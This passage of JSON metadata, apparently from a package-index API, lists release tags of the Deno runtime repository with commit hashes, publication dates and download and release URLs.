ag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/